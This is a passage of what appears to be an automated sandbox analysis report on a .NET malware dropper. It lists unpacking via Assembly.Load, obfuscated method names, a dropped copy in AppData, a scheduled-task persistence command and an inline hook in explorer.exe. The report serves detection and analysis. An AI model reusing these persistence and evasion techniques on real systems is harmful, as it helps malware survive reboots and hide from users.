Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.1385767165.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.1387476539.0000000005256000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.000000000559E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.1385550640.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.0000000005400000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1413475109.0000000004186000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.000000000468E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1415442413.000000000433C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mxDW.pdbSHA256Y source: 890983726372673.exe, mZanCtInfW.exe.1.dr
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.1385767165.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000D.00000003.1387476539.0000000005256000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.000000000559E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.1385550640.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2546100075.0000000005400000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1413475109.0000000004186000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.000000000468E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1417327506.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1415442413.000000000433C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: RegSvcs.exe, 00000010.00000002.1414949296.0000000001900000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1413925702.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1416845022.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: RegSvcs.exe, 00000009.00000002.1386926023.0000000003580000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2542142612.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.2563131962.00000000110FF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2545155032.000000000355A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2547041429.000000000594F000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	.Net Code: Vql42ydHrF System.Reflection.Assembly.Load(byte[])
Source: 1.2.890983726372673.exe.5420000.2.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.890983726372673.exe.3ca4128.0.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	.Net Code: Vql42ydHrF System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416948 pushad ; ret	9_2_00416960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004171B8 push cs; ret	9_2_004171D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041D475 push eax; ret	9_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041D4C2 push eax; ret	9_2_0041D4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041D4CB push eax; ret	9_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041D52C push eax; ret	9_2_0041D532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004115B9 push edi; ret	9_2_004115BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416689 push es; retf	9_2_004166B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_018E225F pushad ; ret	9_2_018E27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_018E27FA pushad ; ret	9_2_018E27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019109AD push ecx; mov dword ptr [esp], ecx	9_2_019109B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_018E283D push eax; iretd	9_2_018E2858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_018E9939 push es; iretd	9_2_018E9940
Source: C:\Windows\explorer.exe	Code function: 10_2_103849B5 push esp; retn 0000h	10_2_10384AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10384B1E push esp; retn 0000h	10_2_10384B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_10384B02 push esp; retn 0000h	10_2_10384B03
Source: C:\Windows\explorer.exe	Code function: 10_2_10530B1E push esp; retn 0000h	10_2_10530B1F
Source: C:\Windows\explorer.exe	Code function: 10_2_10530B02 push esp; retn 0000h	10_2_10530B03
Source: C:\Windows\explorer.exe	Code function: 10_2_105309B5 push esp; retn 0000h	10_2_10530AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_108619B5 push esp; retn 0000h	10_2_10861AE7
Source: C:\Windows\explorer.exe	Code function: 10_2_10861B02 push esp; retn 0000h	10_2_10861B03
Source: C:\Windows\explorer.exe	Code function: 10_2_10861B1E push esp; retn 0000h	10_2_10861B1F
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_031BE7EA push eax; retf	12_2_031BE7F9
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781D600 pushad ; retf	12_2_0781D619
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781099F pushad ; retf	12_2_0781D619
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781CA0B push ecx; ret	12_2_0781CA0C
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_09873B75 push FFFFFF8Bh; iretd	12_2_09873B77
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054027FA pushad ; ret	13_2_054027F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0540225F pushad ; ret	13_2_054027F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054309AD push ecx; mov dword ptr [esp], ecx	13_2_054309B6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0540283D push eax; iretd	13_2_05402858

Source: 890983726372673.exe	Static PE information: section name: .text entropy: 7.607202544398388
Source: mZanCtInfW.exe.1.dr	Static PE information: section name: .text entropy: 7.607202544398388

Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, Rt9PqksCr281Q2Agda.cs	High entropy of concatenated method names: 'ToString', 'Upd9SQvWUx', 'zoK90L3Ici', 'huF984dMrg', 'aj69eqado4', 'MxO9Rr9UDP', 'faj9qwJrwM', 'Rw79CYTu3P', 'G6n9AsmtLU', 'wh99t8C1RG'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, esruh2uaHcP5uC2TI1.cs	High entropy of concatenated method names: 'uySnj6W9nj', 'L7Cnl3Nxwx', 'yCbhP16HMB', 'KeUhIwlWsJ', 'LEynSILXcP', 'q6wn6ZOS1T', 'L0XnGLZjPI', 'wHPnaD0dUX', 'qfEnKo7Wlt', 'QK1nsShnDP'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, EdsrXjUHlnmSh6SnAe.cs	High entropy of concatenated method names: 'zIsypH348t', 'vnGy0eKiqr', 'kSBy8AMtro', 'OIIyeuwiGP', 'Yo3yRACMqV', 'qvJyqpH9LP', 'vjCyCxXly1', 'gaVyAlkwqI', 'Ch8ytsoNbt', 'Xply36F5t2'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, Svrc5g4xGKQhcRDSiK.cs	High entropy of concatenated method names: 'iRQIk5MkqE', 'Y7pILCb57W', 'yhlIZqXJh2', 'BFWIXJDFpm', 'MyhIQ5Glis', 'kVyI97l9OT', 'ckY8oW58ebF3VnN6Jd', 'xASloAqlnBpEOrJBZx', 'lMfIIO9say', 'BObIxnYDmo'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, fqWEPsGDUSZmHbZJV1.cs	High entropy of concatenated method names: 'BkrcYKibIb', 'ojlcWj24AI', 'Sr3cp6lE8h', 'doCc07Qo94', 'wkZcesOLwb', 'RXxcRBJGTR', 'nHXcCKAQbf', 'mdTcAIYQGb', 'WTOc3H1EiY', 'RTTcS2dJBU'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, qP4bQhtw9SdIiI9uKK.cs	High entropy of concatenated method names: 'ScNkTFZXW4', 'j16kmBmMOL', 'rLTk2qD1AV', 'CHjkv7IxUo', 'hhckDl0Sh3', 'LIEkoIMGum', 'mY7k749oRw', 'tnwkYj75sS', 'K5NkW0QRfm', 'VN2kObR6i8'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, QJOLsDznOI9DS74Nen.cs	High entropy of concatenated method names: 'lg95oTfOEB', 'PZd5YSAA4p', 'OcT5Ws69rK', 'gLX5p3mUxI', 'e1p50vLdFs', 'gBZ5ekntge', 'Fgn5R1RSBO', 'Pyl5dJJPVK', 'DEL5TTKG7Y', 'oA75mBZM5E'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, wwAAF015BudUo50WPE.cs	High entropy of concatenated method names: 'K5t2bQCwk', 'dqZvlEBQC', 'Pp5o6c2yO', 'FJN7worcQ', 'Tm8WsVKjB', 'Ld6OktL7L', 'hpcv7O83qtBY8x3rDd', 'xOuAYM0NrWul726bf4', 'enDhV7M7w', 'dce59r4WP'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, iw5JbVIImB06TZ0MDhs.cs	High entropy of concatenated method names: 'NSw5lvtl3x', 'QIh5zH2nyZ', 'DvdMPXqoMi', 'pB7MI2oY02', 'yisM11aO2j', 'RaCMxpvJ7i', 'tcvM4HfV7Q', 'iQTMbm4b0H', 'wZUMwySAcS', 'zfIMNj2u9n'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, YisLVyp7l9OT5pV8oR.cs	High entropy of concatenated method names: 'VU0rbaneqo', 'fPgrN36anw', 'RkhrJ9eoWp', 'ndJrkWK8cM', 'E9OrLgV0Rk', 'fFEJgg9FO3', 'CJTJuEq9AT', 'Ty1JE52yrM', 'nxgJj4vVwc', 'eGmJUBmXVP'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, gTs80kIPbEtPvqgVMK9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iXf5Skl1VG', 'Wqj56cW1Tq', 'v4d5GLRMLA', 'J6j5ahHFyM', 'PiT5KdAk7Q', 'QuF5sIRr9O', 'iUj5f1h18I'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, fQF2cQldCNj7b0kZg6.cs	High entropy of concatenated method names: 'fhU5HkjNC0', 'Oa35JSTQyU', 'alL5r1dXqu', 'mKY5kg4dUA', 'yej5yog8Qf', 'XcK5LNHcsh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, ufQXLmWhlqXJh2DFWJ.cs	High entropy of concatenated method names: 'CorHvJfIIw', 'sBOHoRqASv', 'flHHY95jGH', 'xHpHWuleWj', 'EunHQ5PCJm', 'b8EH9fgB3X', 'wC1HnMkw5N', 'qIuHhNuASj', 'ErbHyFJdme', 'kyFH521WmR'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, AFpmo7OXLRMeqtyh5G.cs	High entropy of concatenated method names: 'gL8JDKe7Fq', 'MFYJ7GrMfF', 'M42H8HZwIF', 'ofBHey5pGq', 'bc4HRcF6A0', 'ws6HqoDKBb', 'Cx0HCNrWyI', 'Ac2HAMsZQl', 'OTYHtUVSkm', 'rmhH361WFL'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, FH0qn2Ej5U4IG2TiJu.cs	High entropy of concatenated method names: 'PxbyQZrLWh', 'cvZyn7H5m2', 'ufuyyAYDQK', 'lUNyM0KVZV', 'PYTyBMQ9OK', 'A6kydE98Sh', 'Dispose', 'c0shwb0DRG', 'CTRhNkm2a3', 'ptOhHtvqf6'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, bblGDqNpULLp0so17J.cs	High entropy of concatenated method names: 'Dispose', 'Y4IIUG2TiJ', 'VpV10FfuE5', 'A56fe5K27T', 'U4yIlG0WNx', 'dHrIzdpfN6', 'ProcessDialogKey', 'KVY1PdsrXj', 'hln1ImSh6S', 'qAe11wQF2c'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, PNvVFBCowmuYw7wn1L.cs	High entropy of concatenated method names: 'pn2kwBX6HJ', 'zOAkHkITu1', 'ouTkrxlPpa', 'Wjarl4SZDu', 'Kjerz16AV5', 'bYlkPERWTF', 'T6vkIf3GWU', 'pIlk1Nsvm1', 'lQZkxFEID5', 'NIKk4I2Zpv'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, o5MkqEYU7pCb57Wa7i.cs	High entropy of concatenated method names: 'gqJNaRFKls', 'KRxNK6SSLx', 'l7dNsdWYZ0', 'wJYNfWoQVm', 'GXWNgPHEJZ', 'hhpNu6IRph', 'zLuNEbFZnW', 'LJQNjoioZb', 'ESTNUQexOh', 'jTgNlyXAMD'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, DiRX9GI4MXQTUXkGUB7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tAWiyXNfDO', 'MYTi5LhGAn', 'noJiMCB3QB', 'tpOiivvyhs', 'ydSiByMZM9', 'UIbiV3q1Ey', 'o6IidQfH4v'
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	High entropy of concatenated method names: 'N4IxbK4BRo', 'eRVxwBK5LT', 'eDRxN7SLxU', 'MS8xHf0dco', 'WKkxJwqMdy', 'GE7xr5arP6', 'aaSxkLcFld', 'RunxL8UnlM', 'ikQxF2ucSy', 'g9OxZlYLrv'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, Rt9PqksCr281Q2Agda.cs	High entropy of concatenated method names: 'ToString', 'Upd9SQvWUx', 'zoK90L3Ici', 'huF984dMrg', 'aj69eqado4', 'MxO9Rr9UDP', 'faj9qwJrwM', 'Rw79CYTu3P', 'G6n9AsmtLU', 'wh99t8C1RG'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, esruh2uaHcP5uC2TI1.cs	High entropy of concatenated method names: 'uySnj6W9nj', 'L7Cnl3Nxwx', 'yCbhP16HMB', 'KeUhIwlWsJ', 'LEynSILXcP', 'q6wn6ZOS1T', 'L0XnGLZjPI', 'wHPnaD0dUX', 'qfEnKo7Wlt', 'QK1nsShnDP'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, EdsrXjUHlnmSh6SnAe.cs	High entropy of concatenated method names: 'zIsypH348t', 'vnGy0eKiqr', 'kSBy8AMtro', 'OIIyeuwiGP', 'Yo3yRACMqV', 'qvJyqpH9LP', 'vjCyCxXly1', 'gaVyAlkwqI', 'Ch8ytsoNbt', 'Xply36F5t2'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, Svrc5g4xGKQhcRDSiK.cs	High entropy of concatenated method names: 'iRQIk5MkqE', 'Y7pILCb57W', 'yhlIZqXJh2', 'BFWIXJDFpm', 'MyhIQ5Glis', 'kVyI97l9OT', 'ckY8oW58ebF3VnN6Jd', 'xASloAqlnBpEOrJBZx', 'lMfIIO9say', 'BObIxnYDmo'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, fqWEPsGDUSZmHbZJV1.cs	High entropy of concatenated method names: 'BkrcYKibIb', 'ojlcWj24AI', 'Sr3cp6lE8h', 'doCc07Qo94', 'wkZcesOLwb', 'RXxcRBJGTR', 'nHXcCKAQbf', 'mdTcAIYQGb', 'WTOc3H1EiY', 'RTTcS2dJBU'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, qP4bQhtw9SdIiI9uKK.cs	High entropy of concatenated method names: 'ScNkTFZXW4', 'j16kmBmMOL', 'rLTk2qD1AV', 'CHjkv7IxUo', 'hhckDl0Sh3', 'LIEkoIMGum', 'mY7k749oRw', 'tnwkYj75sS', 'K5NkW0QRfm', 'VN2kObR6i8'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, QJOLsDznOI9DS74Nen.cs	High entropy of concatenated method names: 'lg95oTfOEB', 'PZd5YSAA4p', 'OcT5Ws69rK', 'gLX5p3mUxI', 'e1p50vLdFs', 'gBZ5ekntge', 'Fgn5R1RSBO', 'Pyl5dJJPVK', 'DEL5TTKG7Y', 'oA75mBZM5E'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, wwAAF015BudUo50WPE.cs	High entropy of concatenated method names: 'K5t2bQCwk', 'dqZvlEBQC', 'Pp5o6c2yO', 'FJN7worcQ', 'Tm8WsVKjB', 'Ld6OktL7L', 'hpcv7O83qtBY8x3rDd', 'xOuAYM0NrWul726bf4', 'enDhV7M7w', 'dce59r4WP'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, iw5JbVIImB06TZ0MDhs.cs	High entropy of concatenated method names: 'NSw5lvtl3x', 'QIh5zH2nyZ', 'DvdMPXqoMi', 'pB7MI2oY02', 'yisM11aO2j', 'RaCMxpvJ7i', 'tcvM4HfV7Q', 'iQTMbm4b0H', 'wZUMwySAcS', 'zfIMNj2u9n'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, YisLVyp7l9OT5pV8oR.cs	High entropy of concatenated method names: 'VU0rbaneqo', 'fPgrN36anw', 'RkhrJ9eoWp', 'ndJrkWK8cM', 'E9OrLgV0Rk', 'fFEJgg9FO3', 'CJTJuEq9AT', 'Ty1JE52yrM', 'nxgJj4vVwc', 'eGmJUBmXVP'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, gTs80kIPbEtPvqgVMK9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iXf5Skl1VG', 'Wqj56cW1Tq', 'v4d5GLRMLA', 'J6j5ahHFyM', 'PiT5KdAk7Q', 'QuF5sIRr9O', 'iUj5f1h18I'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, fQF2cQldCNj7b0kZg6.cs	High entropy of concatenated method names: 'fhU5HkjNC0', 'Oa35JSTQyU', 'alL5r1dXqu', 'mKY5kg4dUA', 'yej5yog8Qf', 'XcK5LNHcsh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, ufQXLmWhlqXJh2DFWJ.cs	High entropy of concatenated method names: 'CorHvJfIIw', 'sBOHoRqASv', 'flHHY95jGH', 'xHpHWuleWj', 'EunHQ5PCJm', 'b8EH9fgB3X', 'wC1HnMkw5N', 'qIuHhNuASj', 'ErbHyFJdme', 'kyFH521WmR'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, AFpmo7OXLRMeqtyh5G.cs	High entropy of concatenated method names: 'gL8JDKe7Fq', 'MFYJ7GrMfF', 'M42H8HZwIF', 'ofBHey5pGq', 'bc4HRcF6A0', 'ws6HqoDKBb', 'Cx0HCNrWyI', 'Ac2HAMsZQl', 'OTYHtUVSkm', 'rmhH361WFL'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, FH0qn2Ej5U4IG2TiJu.cs	High entropy of concatenated method names: 'PxbyQZrLWh', 'cvZyn7H5m2', 'ufuyyAYDQK', 'lUNyM0KVZV', 'PYTyBMQ9OK', 'A6kydE98Sh', 'Dispose', 'c0shwb0DRG', 'CTRhNkm2a3', 'ptOhHtvqf6'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, bblGDqNpULLp0so17J.cs	High entropy of concatenated method names: 'Dispose', 'Y4IIUG2TiJ', 'VpV10FfuE5', 'A56fe5K27T', 'U4yIlG0WNx', 'dHrIzdpfN6', 'ProcessDialogKey', 'KVY1PdsrXj', 'hln1ImSh6S', 'qAe11wQF2c'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, PNvVFBCowmuYw7wn1L.cs	High entropy of concatenated method names: 'pn2kwBX6HJ', 'zOAkHkITu1', 'ouTkrxlPpa', 'Wjarl4SZDu', 'Kjerz16AV5', 'bYlkPERWTF', 'T6vkIf3GWU', 'pIlk1Nsvm1', 'lQZkxFEID5', 'NIKk4I2Zpv'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, o5MkqEYU7pCb57Wa7i.cs	High entropy of concatenated method names: 'gqJNaRFKls', 'KRxNK6SSLx', 'l7dNsdWYZ0', 'wJYNfWoQVm', 'GXWNgPHEJZ', 'hhpNu6IRph', 'zLuNEbFZnW', 'LJQNjoioZb', 'ESTNUQexOh', 'jTgNlyXAMD'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, DiRX9GI4MXQTUXkGUB7.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tAWiyXNfDO', 'MYTi5LhGAn', 'noJiMCB3QB', 'tpOiivvyhs', 'ydSiByMZM9', 'UIbiV3q1Ey', 'o6IidQfH4v'
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	High entropy of concatenated method names: 'N4IxbK4BRo', 'eRVxwBK5LT', 'eDRxN7SLxU', 'MS8xHf0dco', 'WKkxJwqMdy', 'GE7xr5arP6', 'aaSxkLcFld', 'RunxL8UnlM', 'ikQxF2ucSy', 'g9OxZlYLrv'

Source: C:\Users\user\Desktop\890983726372673.exe

File created: C:\Users\user\AppData\Roaming\mZanCtInfW.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\890983726372673.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE6

Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
